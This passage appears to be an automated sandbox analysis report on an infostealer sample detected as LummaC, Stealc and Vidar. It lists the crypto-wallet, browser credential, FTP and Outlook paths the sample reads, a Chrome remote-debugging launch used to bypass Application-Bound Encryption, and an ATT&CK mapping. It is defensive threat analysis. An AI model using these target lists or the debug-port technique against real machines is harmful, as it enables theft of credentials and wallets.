Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1998156221.0000000001664000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.V

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1677868840.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1997064501.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0C40 sqlite3_bind_zeroblob,	0_2_6C7B0C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0D60 sqlite3_bind_parameter_name,	0_2_6C7B0D60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D8EA0 sqlite3_clear_bindings,	0_2_6C6D8EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C7B0B40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D6410 bind,WSAGetLastError,	0_2_6C6D6410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D6070 PR_Listen,	0_2_6C6D6070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	0_2_6C6DC050
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DC030 sqlite3_bind_parameter_count,	0_2_6C6DC030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D60B0 listen,WSAGetLastError,	0_2_6C6D60B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6622D0 sqlite3_bind_blob,	0_2_6C6622D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D63C0 PR_Bind,	0_2_6C6D63C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D9400 sqlite3_bind_int64,	0_2_6C6D9400
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D94F0 sqlite3_bind_text16,	0_2_6C6D94F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D94C0 sqlite3_bind_text,	0_2_6C6D94C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D9480 sqlite3_bind_null,	0_2_6C6D9480
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007DEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,	12_2_007DEC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 12_2_007DDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,	12_2_007DDF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Windows Service	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	11 Registry Run Keys / Startup Folder	612 Process Injection	12 Software Packing	NTDS	247 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	771 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Rootkit	DCSync	261 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	612 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	42%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\DocumentsHDGDGHCAAK.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe	100%	Joe Sandbox ML
C:\Users\user\DocumentsHDGDGHCAAK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\rtrgvxkbkvbm\ekteefutuwre.exe	58%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	37%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\test2[1].exe	58%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	58%	ReversingLabs	Win64.Trojan.Generic
